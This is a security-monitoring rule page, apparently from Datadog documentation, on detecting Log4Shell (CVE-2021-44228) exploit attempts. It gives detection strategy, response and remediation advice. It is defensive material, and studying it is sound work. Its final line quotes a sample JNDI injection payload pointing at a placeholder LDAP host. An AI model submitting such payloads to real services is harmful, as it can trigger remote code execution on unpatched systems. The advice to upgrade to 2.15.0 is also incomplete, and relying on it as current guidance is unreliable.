Log4shell RCE attempts - CVE-2021-44228

이 페이지는 아직 한국어로 제공되지 않으며 번역 작업 중입니다. 번역에 관한 질문이나 의견이 있으시면 언제든지 저희에게 연락해 주십시오.

Goal

Detect attempts to exploit the log4j vulnerability (CVE-2021-44228).

The vulnerability has CVSS Score: 10.0 CRITICAL and can lead to Remote Code Execution (RCE).

Strategy

Monitor payload matching the known patterns for CVE-2021-44228 (event rule: #sqr-000-017) and generate an Application Security signal with Info severity if at least 10 attacks are targeting a service running a Java application.

Response

Consider blocking the attacking IP(s) temporarily to prevent them to reach deeper parts of your production systems.

Remediation

First, check if the impacted web service uses a vulnerable version of the log4j module. Versions from 2.0-beta9 through 2.12.1, and 2.13.0 through 2.14.1, including 2.15.0-rc1 - are vulnerable.

If vulnerable, apply the following remediations to prevent exploit of the Log4Shell vulnerability:

  • Update log4j to the latest patched version immediately (>= 2.15.0)
  • Disable lookups by setting formatMsgNoLookups=true. Only available from log4j >= 2.10 versions
  • Use a non-vulnerable or empty implementation of the class org.apache.logging.log4j.core.lookup.JndiLookup

Finally, investigate evidences of log containing malicious payload like ${jndi:ldap://x.x.x.x/#Touch} through Datadog ASM.